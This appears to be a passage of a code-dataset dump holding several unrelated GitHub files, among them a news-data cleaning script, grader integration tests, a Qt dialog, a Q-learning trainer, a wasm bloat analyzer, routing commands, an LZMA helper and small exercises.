data.drop_duplicates(subset=\"text\")\n\n# convert text column and publish date to strings\ndata[\"text\"] = data[\"text\"].astype(str)\ndata[\"publish_date\"] = data[\"publish_date\"].astype(str)\n\n# authors was stored as a full string such as \"[Kathryn Hudson]\" so this line will convert it into a proper list of strings such as [\"Kathryn Hudson\"]\ndata['authors'] = data.authors.apply(lambda x: x[1:-1].split(','))\n# keeping only first entry 
since often other junk would be included in the list such as \"Min. Read\"\ndata['authors'] = data['authors'].str[0]\n\n# this line will drop any rows that have titles which match any of the strings in the list\ndata = data[~data[\"title\"].isin(\n [\"Terms of Use\", \"Privacy Policy\", \"-\", \"- The Weather Network\", \"Public Appearances\"])]\n\n# drops articles with empty body text\ndata = data[~data[\"text\"].isin([\"nan\"])]\n\n# store articles that have no publish date\nno_publish = data[data[\"publish_date\"] == \"nan\"]\n\n# only keep articles that have a 2020 date\ndata = data[data[\"publish_date\"].astype(str).str.match(\"(.*2020.*)\")]\n\ndata = data.append(no_publish)\n\n\n# only keeps rows that have an outlet which we have scraped\n# MODIFY THIS LINE WHEN YOU ADD NEW OUTLETS\ndata = data[data[\"outlet\"].isin([\"thestar\", \"The Record\", \"cbc\", \"ctvnews\", \"nationalpost\", \"torontosun\", \"cp24\", \"mapleridgenews\", \"tricitynews\", \"langleyadvancetimes\", \"abbynews\", \"theprogress\", \"delta-optimist\",\n \"northdeltareporter\", \"surreynowleader\", \"vancouverobserver\", \"vancourier\", \"srtraight\", \"nsnews\", \"richmond-news\", \"burnabynow\", \"richmondsentinel\", \"newwestrecord\", \"bowenislandundercurrent\"])]\n\n\n# drops all rows where the Authors list is empty *AND* the publish date is empty\n# using an or condition because the only time this condition is false is when both predicates are false\n# which would be the case when an articles is missing authors and publish date\ndata = data[(data['authors'] != \"\") | (data['publish_date'] != \"nan\")]\n\n\n# data.sort_values(by=['outlet'], inplace=True, axis=0)\n\n\ndata.to_csv(\"clean.csv\", index=False)\n","repo_name":"jannalouisea/newsworthy_ml","sub_path":"clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4871590854","text":"\"\"\"\nThese tests are considered integration tests because they have side effects.\nThey write to the file system (in tests/fixtures/example).\nThey rely on gcc being available.\n\"\"\"\n\n# Standard Library\n# TODO: stub file system?\nimport os\nimport platform\nimport re\nimport shutil\n\n# TODO: rename to test_ui and setup mocking with tkinter\n# for now, run all the steps that ui.py would run in main, but without errors and warnings for the user\nimport unittest\n\n# Third party\nfrom docx import Document\n\nfrom src.file_management.compile import compile_c\nfrom src.file_management.feedback import create_feedback_file, get_missing_names\n\n# functions under test\nfrom src.file_management.zip_archives import setup_safe_mode, unzip, unzip_outer\n\n\nclass Base:\n # needed as class variables to run teardown after all tests, instead of each test.\n cwd = os.path.join(\"tests\", \"fixtures\")\n safe_cwd = os.path.join(cwd, \"example\")\n\n def __init__(self, methodName=\"runTest\"):\n unittest.TestCase.__init__(self, methodName)\n self.safe_cwd = self.__class__.safe_cwd\n self.zip_path = os.path.join(self.cwd, \"example.zip\")\n self.example_feedback_file = os.path.join(self.cwd, \"example_feedback.docx\")\n self.safe_zip_path = os.path.join(self.safe_cwd, \"example.zip\")\n self.example_student_dir = os.path.join(self.safe_cwd, \"final_fake_student_2012347\")\n self.example_student_code = os.path.join(\n self.example_student_dir, \"assignment1\", \"assignment1.c\"\n )\n self.feedback_file = os.path.join(self.safe_cwd, 
\"feedback.docx\")\n self.all_names = [\"fake_student\", \"other_fake_student\", \"final_fake_student\"]\n self.missing_names = [\"missing_student\"]\n\n @classmethod\n def tearDownClass(cls):\n # delete non-empty example dir\n shutil.rmtree(cls.safe_cwd, ignore_errors=True)\n\n # https://stackoverflow.com/a/18627017/6305204\n # nosetests runs tests in order by name\n # not ideal, but need to enforce order until testing tkinter directly, or using different UI framework.\n def test_01_safe_mode(self):\n \"\"\"\n setup_safe_mode should create a new dir and move the main .zip archive into it before extracting\n \"\"\"\n # example dir should not exist yet\n assert not os.path.exists(self.safe_cwd)\n assert not os.path.exists(self.safe_zip_path)\n setup_safe_mode(self.cwd, self.zip_path)\n assert os.path.exists(self.safe_cwd)\n assert os.path.exists(self.zip_path)\n\n\nclass TestMainSafeModeSharedState(Base, unittest.TestCase):\n def test_02_unzip(self):\n \"\"\"\n unzip_outer should unzip the main .zip archive\n \"\"\"\n assert not os.path.exists(self.example_student_dir)\n # when names is [\"\"], everything is extracted\n unzip_outer(self.safe_zip_path, [\"\"])\n assert os.path.exists(self.example_student_dir)\n\n def test_03_unzip_inner(self):\n \"\"\"\n unzip should unzip each students .zip archives nested in the main zip archive\n \"\"\"\n assert not os.path.exists(self.example_student_code)\n unzip(self.safe_cwd)\n assert os.path.exists(self.example_student_code)\n\n def test_04_missing_names(self):\n \"\"\"\n get_missing_names should return names of students who didn't submit anything\n \"\"\"\n missing_names = get_missing_names(self.safe_cwd, self.all_names + self.missing_names)\n self.assertListEqual(self.missing_names, missing_names)\n\n def test_05_compile(self):\n \"\"\"\n compile_c should compile assignment1.c to assignment1 executable.\n it should also return the error found compiling other_fake_student_2012346/assignment1.c\n \"\"\"\n # compiled_file = self.example_student_code.replace(\".c\", \"\")\n compiled_file = re.sub(r\"\\.c$\", \"\", self.example_student_code)\n\n # gcc output always add .exe on windows\n if platform.system() == \"Windows\":\n compiled_file = f\"{compiled_file}.exe\"\n\n assert not os.path.exists(compiled_file)\n # hide output for tests\n errors = compile_c(self.safe_cwd, capture_output=True)\n assert errors == 1\n assert os.path.exists(compiled_file)\n\n def test_06_feedback_exists(self):\n \"\"\"\n create_feedback_file should create feedback.docx\n \"\"\"\n assert not os.path.exists(self.feedback_file)\n create_feedback_file(self.safe_cwd, self.all_names, self.missing_names)\n assert os.path.exists(self.feedback_file)\n\n def test_07_feedback_content(self):\n expected_table = Document(self.example_feedback_file).tables[0]\n actual_table = Document(self.feedback_file).tables[0]\n\n for expected_row, actual_row in zip(expected_table.rows, actual_table.rows):\n for expected_cell, actual_cell in zip(expected_row.cells, actual_row.cells):\n assert expected_cell.text == actual_cell.text\n\n\nclass TestMainSafeModeSpecificStudents(Base, unittest.TestCase):\n def test_02_unzip(self):\n \"\"\"\n when students are passed, unzip_outer should only extract files containing that students name\n \"\"\"\n assert not os.path.exists(self.example_student_dir)\n unzip_outer(self.safe_zip_path, [\"fake_student\", \"other_fake_student\"])\n\n # final_fake_student is the only one not extracted, all others are extracted\n assert not os.path.exists(self.example_student_dir)\n 
for dirname in [\"fake_student_2012345\", \"other_fake_student_2012346\"]:\n student_dir = os.path.join(self.safe_cwd, dirname)\n assert os.path.exists(student_dir)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ConorSheehan1/comp_corrector","sub_path":"tests/integration/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2981505549","text":"import datetime\nimport sys\nfrom logging import getLogger\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QDialog, QSizePolicy, QLayout, QApplication, QWidget\nfrom legendary.core import LegendaryCore\nfrom legendary.models.game import InstalledGame\n\nfrom rare.ui.components.dialogs.sync_save_dialog import Ui_SyncSaveDialog\nfrom rare.ui.components.tabs.games.game_info.sync_widget import Ui_SyncWidget\nfrom rare.utils.misc import icon\n\nlogger = getLogger(\"Cloud Saves\")\n\n\nclass CloudSaveDialog(QDialog, Ui_SyncSaveDialog):\n DOWNLOAD = 2\n UPLOAD = 1\n CANCEL = 0\n SKIP = 3\n\n def __init__(\n self,\n igame: InstalledGame,\n dt_local: datetime.datetime,\n dt_remote: datetime.datetime,\n ):\n super(CloudSaveDialog, self).__init__()\n self.setupUi(self)\n\n self.sync_widget = QWidget()\n self.sync_ui = Ui_SyncWidget()\n self.sync_ui.setupUi(self.sync_widget)\n\n self.sync_widget_layout.addWidget(self.sync_widget)\n\n self.setAttribute(Qt.WA_DeleteOnClose, True)\n self.setWindowFlags(Qt.Dialog | Qt.CustomizeWindowHint | Qt.WindowTitleHint)\n\n self.status = self.CANCEL\n\n self.title_label.setText(f\"{self.title_label.text()} {igame.title}\")\n\n newer = self.tr(\"Newer\")\n if dt_remote and dt_local:\n self.sync_ui.age_label_local.setText(\n f\"{newer}\" if dt_remote < dt_local else \" \"\n )\n self.sync_ui.age_label_remote.setText(\n f\"{newer}\" if dt_remote > dt_local else \" \"\n )\n # Set status, if one of them is None\n elif dt_remote and not dt_local:\n self.status = self.DOWNLOAD\n elif not dt_remote and dt_local:\n self.status = self.UPLOAD\n else:\n self.status = self.SKIP\n\n self.sync_ui.date_info_local.setText(dt_local.strftime(\"%A, %d. %B %Y %X\") if dt_local else \"None\")\n self.sync_ui.date_info_remote.setText(dt_remote.strftime(\"%A, %d. 
%B %Y %X\") if dt_remote else \"None\")\n\n self.sync_ui.icon_local.setPixmap(icon(\"mdi.harddisk\", \"fa.desktop\").pixmap(128, 128))\n self.sync_ui.icon_remote.setPixmap(icon(\"mdi.cloud-outline\", \"ei.cloud\").pixmap(128, 128))\n\n self.sync_ui.upload_button.clicked.connect(lambda: self.btn_clicked(self.UPLOAD))\n self.sync_ui.download_button.clicked.connect(lambda: self.btn_clicked(self.DOWNLOAD))\n self.cancel_button.clicked.connect(self.close)\n\n self.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)\n self.layout().setSizeConstraint(QLayout.SetFixedSize)\n\n def get_action(self):\n if self.status == self.SKIP:\n return self.SKIP\n self.exec_()\n return self.status\n\n def btn_clicked(self, status):\n self.status = status\n self.close()\n\n\ndef test_dialog():\n app = QApplication(sys.argv)\n core = LegendaryCore()\n dlg = CloudSaveDialog(core.get_installed_list()[0], datetime.datetime.now(),\n datetime.datetime.strptime(\"2021,1\", \"%Y,%M\"))\n print(dlg.get_action())\n\n\nif __name__ == '__main__':\n test_dialog()\n","repo_name":"Dummerle/Rare","sub_path":"rare/components/dialogs/cloud_save_dialog.py","file_name":"cloud_save_dialog.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"40"} +{"seq_id":"27196498103","text":"from Environment import Environment\nimport numpy as np\nfrom tqdm import tqdm\nimport time\nfrom collections import Counter\n\nc1, c2, c3, arm, last_l, last_r = list(range(0, 6))\nempty, red, blue, green = list(range(0, 4))\nactions = [\"pickL\", \"pickM\", \"pickR\", \"putL\", \"putR\"]\n\n\ndef updateQ(Q, s, a, r, sn, gamma, alpha=0.05):\n old_value = Q[s[c1], s[c2], s[c3], s[arm], s[last_l], s[last_r], actions.index(a)]\n optimal_fut_value = np.max(Q[sn[c1], sn[c2], sn[c3], sn[arm], sn[last_l], sn[last_r], :])\n update = (1.0 - alpha) * old_value + alpha * (r + gamma * optimal_fut_value)\n Q[s[c1], s[c2], s[c3], s[arm], s[last_l], s[last_r], actions.index(a)] = update\n\n\n\ndef train_Q(iterations=10000, traj_len=100, alpha=1.0, alpha_decay=0.999, \\\n alpha_min=0.05, gamma=0.95, exp_decay=0.999, exp_min=0.5):\n gamma = 0.95\n Q = np.ones((4, 4, 4, 4, 4, 4, 5))\n exp = 1.0\n for it in tqdm(range(iterations)):\n env = Environment()\n s = env.get_current_state()\n for step in range(traj_len):\n if np.random.uniform(0, 1) <= max(exp, exp_min):\n a = actions[np.random.randint(0, 5)]\n else:\n a = actions[np.argmax(Q[s[c1], s[c2], s[c3], s[arm], s[last_l], s[last_r], :])]\n r = env.get_reward(s, a)\n sn = env.execute_action(a)\n updateQ(Q, s, a, r, sn, gamma, max(alpha, alpha_min))\n s = sn\n alpha = alpha * alpha_decay\n exp = exp * exp_decay\n return Q","repo_name":"sprkrd/UPC-MAI-CIR","sub_path":"irl/RL.py","file_name":"RL.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15244144840","text":"from django.shortcuts import render\nfrom .models import Userdetail, Activity\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\n\n# Create your views here.\n\n\ndef get(request):\n us = Userdetail.objects.all()\n us_s = []\n\n act_s = []\n\n for i in us:\n lst = []\n if i.userid in Activity.objects.all().values_list(\"userid\", flat=True):\n act = Activity.objects.filter(userid=i.userid)\n for j in act:\n lst.append(\n {\n 'start_time': j.start_time,\n 'end_time': j.end_time,\n })\n us_s.append({\n 'userid': i.userid,\n 'real_name' : i.real_name,\n 
'tz' : str(i.tz),\n 'activity' : lst\n })\n\n\n data = {\n 'Member' : us_s\n }\n return JsonResponse(data)\n\n","repo_name":"AmanShrivastav/modeltojson","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29778666766","text":"#!/usr/bin/env python3\n\n# USAGE: python3 lib_bloat.py ... \n\n# NOTE: For this to work reliably, the linked wasm file needs a name section,\n# with mangled names. That means linking with -g or --profiling-funcs, and with\n# -Wl,--no-demangle\n\n# This script tracks weak symbols separately from defined functions. This is\n# weak symbols are not attributable to only one object file, and removing\n# the entire object from the link would not remove the weak symbol from the\n# final linked output unless that object is the only one defining the symbol.\n\nfrom collections import namedtuple\nimport operator\nimport os\nfrom pathlib import Path\nimport subprocess\nimport sys\n\nLLVM_DIR = Path('/s/emr/install/bin')\nBLOATY_DIR = Path.home() / 'software' / 'bloaty'\nVERBOSE = False\n\ntool_output_cache = {}\ndef run_tool(cmd):\n cmd_str = repr(cmd)\n if cmd_str in tool_output_cache:\n return tool_output_cache[cmd_str]\n if VERBOSE:\n print(' '.join([str(p) for p in cmd]))\n\n result = subprocess.run(cmd, capture_output=True)\n if result.returncode:\n print(f'Command Failed:')\n print(' '.join([str(p) for p in cmd]))\n print(result.stdout.decode())\n print(result.stderr.decode())\n raise subprocess.CalledProcessError(result.returncode, cmd)\n result_text = result.stdout.decode()\n tool_output_cache[cmd_str] = result_text\n return result_text\n\n\ndef GetSymSizes(wasm):\n bloaty = BLOATY_DIR / 'bloaty'\n bloaty_output = run_tool([bloaty, '-d', 'symbols', '-n', '0',\n '--demangle=none', '--csv', wasm])\n sym_sizes = {}\n total_size = 0\n for line in bloaty_output.split('\\n'):\n #print(line)\n if (line.startswith('[section') or line.endswith('filesize') or\n line.startswith('[WASM Header') or len(line) == 0):\n continue\n #print(line)\n name, vmsize, filesize = line.split(',')\n total_size += int(filesize)\n sym_sizes[name] = int(filesize)\n\n print(f'{len(sym_sizes)} symbols in {wasm} ({total_size:,} bytes)')\n return sym_sizes\n\n\ndef GetLibFunctions(libs):\n nm = LLVM_DIR / 'llvm-nm'\n func_names = set()\n weak_names = set()\n data_names = {}\n local_data_names = set()\n for lib in libs:\n functions = 0\n weaks = 0\n datas = 0\n local_datas = 0\n nm_output = run_tool([nm, lib])\n for line in nm_output.split('\\n'):\n try:\n addr, symtype, name = line.split()\n #print(f'type {symtype}, name {name}')\n if symtype.lower() == 't': # A global or local defined function sym\n func_names.add(name)\n functions += 1\n elif symtype.lower() == 'w': # A global or local weak symbol\n weak_names.add(name)\n weaks += 1\n elif symtype.lower() == 'd':\n #if name in data_names and not name.startswith('.L') and not 'piecewise_construct' in name:\n # print(f'Warning: duplicate data name {name} in {lib} and {data_names[name]}')\n if name.startswith('.L'):\n local_data_names.add(name)\n local_datas += 1\n else:\n data_names[name] = lib\n datas += 1\n except ValueError: # fewer than 3 tokens\n continue\n if VERBOSE:\n print(f'{functions} functions, {weaks} weak symbols, and {data} data symbols in {lib}')\n return func_names, weak_names, data_names, local_data_names\n\n\nLibSize = namedtuple('LibSize', ['name', 'function', 'weak', 'data', 
'local'])\n\ndef GetLibSize(libs, sym_sizes):\n lib_size = 0\n lib_weak_size = 0\n lib_data_size = 0\n local_data_size = 0\n lib_funcs, lib_weaks, lib_datas, lib_local_datas = GetLibFunctions(libs)\n for sym, size in sym_sizes.items():\n if sym in lib_funcs:\n lib_size += size\n elif sym in lib_weaks:\n lib_weak_size += size\n if sym.startswith('.rodata') or sym.startswith('.data'):\n stripped_name = sym.removeprefix('.rodata.').removeprefix('.data.')\n if stripped_name in lib_datas:\n lib_data_size += size\n elif stripped_name.startswith('.L'):\n local_data_size += size\n name = libs[0].name if len(libs) == 1 else '(aggregate)'\n return LibSize(name, lib_size, lib_weak_size, lib_data_size, local_data_size)\n\n\ndef GetDataSize(sym_sizes):\n data_sym_count = 0\n data_size = 0\n for name, size in sym_sizes.items():\n if name == '.data' or name == '.rodata':\n print(f'Warning: wasm file seems to have a single merged {name}'\n f'section of size {size}')\n elif (name.startswith('.data')\n or name.startswith('.rodata')\n or name.startswith('.tdata')):\n data_sym_count += 1\n data_size += size\n return data_sym_count, data_size\n\ndef main(args):\n libs = [Path(f) for f in args[:-1]]\n linked_wasm = Path(args[-1])\n\n sym_sizes = GetSymSizes(linked_wasm)\n linked_sym_size = sum(size for sym, size in sym_sizes.items())\n data_sym_count, data_sym_size = GetDataSize(sym_sizes)\n #print(f'Total symbols size in {linked_wasm}: {linked_sym_size:,}')\n print(f'{data_sym_count} data symbols ({data_sym_size:,} bytes)')\n\n sizes = []\n\n for lib in libs:\n sizes.append(GetLibSize([lib], sym_sizes))\n sizes.sort(key=lambda i: i.function + i.weak, reverse=True)\n\n def Percent(s):\n return s / linked_sym_size * 100\n\n print(' ' * 62 + 'Functions' + ' ' * 4 + '(Functions + weak syms)')\n print(f'{\"Name\":50}' + ' size pct size pct')\n for lib in sizes:\n print(f'{lib.name:50}{lib.function:10,}{Percent(lib.function):10.1f}%\\t', end='')\n combined = lib.function + lib.weak\n print(f'{combined:10,}{Percent(combined):10.1f}%')\n\n\n sizes.sort(key=operator.attrgetter('data'), reverse=True)\n print(' ' * 62 + 'Data')\n print(f'{\"Name\":50}' + ' size pct (of all data)')\n for lib in sizes:\n print(f'{lib.name:50}{lib.data:10,}{lib.data / data_sym_size*100:10.1f}%')\n\n\n libs_size_sum = sum(lib.function for lib in sizes)\n # To calculate weak symbols properly, we want each weak symbol to be counted\n # only once globally, rather than once per input/library. So, run the calculation\n # again, but with all of the inputs together (which deduplicates all symbols).\n # It seems to happen in some\n # cases that the sum of the strongly-defined function sizes in the libs is\n # also larger than the deduplicated total (this shouldn't be true if the inputs\n # are object files rather than archives, and are all included in the link,\n # as this would result in a multiple definition error). 
Warn in this case.\n # Probably there is some inaccuracy in this script, or perhaps some object\n # file was generated but not actually included in the link.\n deduped_size = GetLibSize(libs, sym_sizes)\n if libs_size_sum != deduped_size.function:\n print(f'warning: sum of strong definition sizes from all inputs is {libs_size_sum}, deduplicated total is {deduped_size.function}')\n #assert total_size.function == libs_size\n deduped_weak_size = deduped_size.function + deduped_size.weak\n #libs_weak_size = sum(lib.function + lib.weak for lib in sizes)\n libs_data_size = sum(lib.data for lib in sizes)\n\n print(f'Total size covered by strong functions in libs: {deduped_size.function:,} of {linked_sym_size:,} bytes ({Percent(deduped_size.function):.1f}%)')\n print(f'Total size covered by strong and weak functions in libs: {deduped_weak_size:,} of {linked_sym_size:,} bytes ({Percent(deduped_weak_size):.1f}%)')\n print(f'Total size covered by public data in libs: {libs_data_size:,} of {data_sym_size:,} bytes ({Percent(libs_data_size):.1f}% of total symbols, {libs_data_size/data_sym_size* 100:.1f}% of data section)')\n local_data = sizes[0].local\n print(f'Total size covered by local data (not attributable to libs): {local_data:,} of {data_sym_size:,} bytes ({Percent(local_data):.1f}% of total symbols, {local_data/data_sym_size*100:.1f}% of data section)')\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"dschuff/lib-bloat","sub_path":"lib_bloat.py","file_name":"lib_bloat.py","file_ext":"py","file_size_in_byte":8419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37251473396","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nModified on Fri Jul 2 19:55:47 2021\r\n\r\nAuthor: Vaishak\r\n\r\nDescrption : This code demonstrates the object segmentation using a pre-trained model.\r\n\"\"\"\r\n\r\n## Import required modules/packages\r\nimport os\r\nimport numpy as np\r\nfrom cv2 import cv2\r\nfrom pixellib.semantic import semantic_segmentation\r\n\r\ndef load_images_from_folder(folder)->list:\r\n '''\r\n Description : Loads the images from the given directory\r\n\r\n Input argument(s) : folder (type = str) - Input directory path to input images\r\n\r\n Returns : images (type = list) - List of image\r\n '''\r\n images = []\r\n for filename in os.listdir(folder):\r\n img = cv2.imread(os.path.join(folder, filename))\r\n if img is not None:\r\n images.append(img)\r\n return images\r\n\r\n## Main/Driver Function\r\nif __name__ == \"__main__\":\r\n\r\n # Load Input images\r\n IMAGEPATH = 'Input Images'\r\n COLORIMAGELIST = load_images_from_folder(IMAGEPATH)\r\n\r\n # Process each image\r\n for idx, image in enumerate(COLORIMAGELIST):\r\n\r\n # Segment image\r\n segment_image = semantic_segmentation()\r\n segment_image.load_pascalvoc_model(\"deeplabv3_xception_tf_dim_ordering_tf_kernels.h5\")\r\n process_frame = True\r\n segmap, seg_overlay = segment_image.segmentAsPascalvoc(image, process_frame)\r\n\r\n # Post-Processing on image\r\n gray = cv2.cvtColor(seg_overlay, cv2.COLOR_BGR2GRAY)\r\n ret2, mask = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n\r\n # Create a mask to the replace background pixels with the grayscale value \"255\"\r\n seg_output = cv2.bitwise_and(image, image, mask=Mask)\r\n b_plane = (seg_output[:, :, 2] == 0)\r\n g_plane = (seg_output[:, :, 1] == 0)\r\n r_plane = (seg_output[:, :, 0] == 0)\r\n black = np.where(r_plane & g_plane & b_plane)\r\n seg_output[black] = (255, 255, 255)\r\n\r\n 
# Write output image\r\n cv2.imwrite(\"Output images/seg_output\"+ str(idx)+\".jpg\", seg_output)\r\n \r\n","repo_name":"VaishShetty/Object-Segmentation","sub_path":"MainCode.py","file_name":"MainCode.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21314632962","text":"from src.utils import *\nfrom src.clientMessages import *\nfrom src.readFiles import *\nimport config\n\ndef help():\n print(\n \"Command List:\" \n + \"\\n-update \"\n + \"\\n-step\"\n + \"\\n-packets\"\n + \"\\n-display\"\n + \"\\n-disable \"\n + \"\\n-crash\" \n )\n\ndef update(s1, s2, cost):\n primaryNode = config.var[\"primary\"][\"primaryNode\"]\n if(str(primaryNode[\"id\"]) == s1):\n if cost == \"inf\":\n primaryNode[\"cost\"][s2][\"pathCost\"] = \"inf\"\n primaryNode[\"cost\"][s2][\"nextHop\"] = \"-\"\n else: \n primaryNode[\"cost\"][s2][\"pathCost\"] = int(cost)\n primaryNode[\"cost\"][s2][\"nextHop\"] = s2\n config.var[\"primary\"][\"primaryNode\"] = primaryNode\n print(f\"update SUCCESS\")\n else:\n print(\"update: server id 1 must be the server you input this command on\")\n\ndef step():\n readyToReceiveMessage()\n\n\ndef packets():\n packets = config.var[\"primary\"][\"packets\"]\n print(\"------------------------------\")\n print(f\"Packets Recieved: {packets}\")\n print(\"------------------------------\")\n \n \ndef display():\n primaryNode = config.var[\"primary\"][\"primaryNode\"]\n nodeList = config.var[\"servers\"][\"nodeList\"]\n table = []\n table.append(\"Server ID Next ID Cost\\n\")\n primaryID = str(primaryNode[\"id\"])\n table.append(f' {primaryID}\\t\\t{primaryNode[\"cost\"][primaryID][\"nextHop\"]}\\t{primaryNode[\"cost\"][primaryID][\"pathCost\"]}\\n')\n for node in nodeList:\n id = str(node[\"id\"])\n table.append(f' {id}\\t\\t{primaryNode[\"cost\"][id][\"nextHop\"]}\\t{primaryNode[\"cost\"][id][\"pathCost\"]}\\n')\n print(\"\".join(table))\n \ndef disable(id):\n primaryNode = config.var[\"primary\"][\"primaryNode\"]\n neighbors = readInitialCosts(config.var[\"settings\"][\"filename\"], config.var[\"settings\"][\"numServers\"], config.var[\"settings\"][\"numEdges\"], primaryNode)\n if neighbors[id] != \"inf\":\n primaryNode[\"cost\"][id][\"pathCost\"] = \"inf\"\n primaryNode[\"cost\"][id][\"nextHop\"] = \"-\"\n disableConnection(id)\n config.var[\"primary\"][\"primaryNode\"] = primaryNode\n \n \ndef crash():\n primaryNode = config.var[\"primary\"][\"primaryNode\"]\n neighbors = readInitialCosts(config.var[\"settings\"][\"filename\"], config.var[\"settings\"][\"numServers\"], config.var[\"settings\"][\"numEdges\"], primaryNode)\n nodeList = config.var[\"servers\"][\"nodeList\"]\n \n \n for node in nodeList:\n id = str(node[\"id\"])\n if neighbors[id] != \"inf\":\n primaryNode[\"cost\"][id][\"pathCost\"] = \"inf\"\n primaryNode[\"cost\"][id][\"nextHop\"] = \"-\"\n disableConnection(id) \n config.var[\"primary\"][\"primaryNode\"] = primaryNode","repo_name":"MikeB1124/COMP-429-Distance-Vector-Routing","sub_path":"src/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36622067050","text":"from collections import defaultdict\nDEBUG = False\nDIR = [[1,0], [-1,0], [0, 1], [0, -1]]\nclass Solution:\n def exist(self, board, word) :\n board_dict = defaultdict(int)\n word_dict = defaultdict(int)\n for l in board:\n for c in l:\n board_dict[c] += 1\n for c in 
word:\n word_dict[c] += 1\n for k, item in board_dict.items():\n word_dict[k] -= item\n for k, item in word_dict.items():\n if item > 0:\n return False\n self.board = board\n self.m = len(board)\n self.n = len(board[0])\n self.word = word\n self.len = len(word)\n self.total = self.m * self.n\n if self.len > self.total:\n return False\n idx_dict = defaultdict(list)\n for idx, c in enumerate(word):\n idx_dict[c].append(idx)\n start_c = word[0]\n start_list = []\n self.edge_map = [[[] for i in range(self.n)] for j in range(self.m)]\n if DEBUG:\n print(self.edge_map)\n for row_idx, row in enumerate(board):\n for col_idx, c in enumerate(row):\n if c == start_c:\n start_list.append((row_idx,col_idx))\n idx_list = idx_dict[c]\n for idx in idx_list:\n if idx >= (self.len -1):\n continue\n next_idx = idx+1\n next_c = word[next_idx]\n idx_list2 = idx_dict[next_c]\n for d in DIR:\n r, c= row_idx + d[0], col_idx + d[1]\n if DEBUG:\n print(row_idx, r, col_idx, c)\n if r<0 or r>= self.m:\n continue\n if c<0 or c>= self.n:\n continue\n if board[r][c] == next_c:\n self.edge_map[row_idx][col_idx].append((r,c))\n if DEBUG:\n for i in self.edge_map:\n print(i)\n # print(self.edge_map)\n\n\n self.gone = [[False for i in range(self.n)] for j in range(self.m)]\n\n for pos in start_list:\n r, c = pos\n self.gone[r][c] = True\n if self.dfs(0,r,c):\n return True\n self.gone[r][c] = False\n\n return False\n\n\n def dfs(self, idx, r, c):\n if DEBUG:\n print(idx, r, c)\n if idx == (self.len-1 ):\n return True\n for next_pos in self.edge_map[r][c]:\n next_r, next_c = next_pos\n if not self.gone[next_r][next_c]:\n if self.word[idx+1] == self.board[next_r][next_c]:\n self.gone[next_r][next_c] = True\n if self.dfs(idx+1, next_r,next_c):\n return True\n self.gone[next_r][next_c] = False\n return False\n\nif DEBUG:\n sol = Solution()\n print(sol.exist([[\"a\",\"a\",\"a\",\"a\"],[\"a\",\"a\",\"a\",\"a\"],[\"a\",\"a\",\"a\",\"a\"]], \"aaaaaaaaaaab\"))\n\n","repo_name":"rundun159/problem_solving","sub_path":"leetcode/2021_4/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1261629836","text":"import lzma\nfrom hashlib import md5\n\n\n\ndef len_2_bytes(datalen, max_len=4):\n data = []\n while datalen > 0:\n item = datalen % 256\n datalen = int(datalen / 256)\n data.append(item)\n while len(data) < max_len:\n data.append(0)\n return data\n\n\ndef compress(data, max_len = 4):\n filters = [\n {\n \"id\": lzma.FILTER_LZMA1,\n \"dict_size\": 256 * 1024,\n \"lc\": 3,\n \"lp\": 0,\n \"pb\": 2,\n \"mode\": lzma.MODE_NORMAL\n },\n ]\n\n compressed_data = lzma.compress(data, format=lzma.FORMAT_ALONE, filters=filters)\n lzmadata = bytearray()\n\n for i in range(0, 5):\n lzmadata.append(compressed_data[i])\n\n data_size = len_2_bytes(len(data), max_len)\n\n for size in data_size:\n lzmadata.append(size)\n for i in range(13, len(compressed_data)):\n lzmadata.append(compressed_data[i])\n\n\n return lzmadata\n","repo_name":"PhoenixFire6934/Classic-Brawl","sub_path":"Patcher/LZMA.py","file_name":"LZMA.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"40"} +{"seq_id":"19754917162","text":"valor_inicial = float(input('Digite o valor inicial R$: '))\ntaxa_juros = float(input('Digite a taxa de juros em %: '))\nperiodo = int(input('Quantos anos deseja investir: '))\n\nvalor_final = valor_inicial\n\nfor ano in range(periodo):\n 
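# the rate is entered as a percentage (e.g. 5 for 5%), so divide by 100 to get the yearly growth factor\n    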
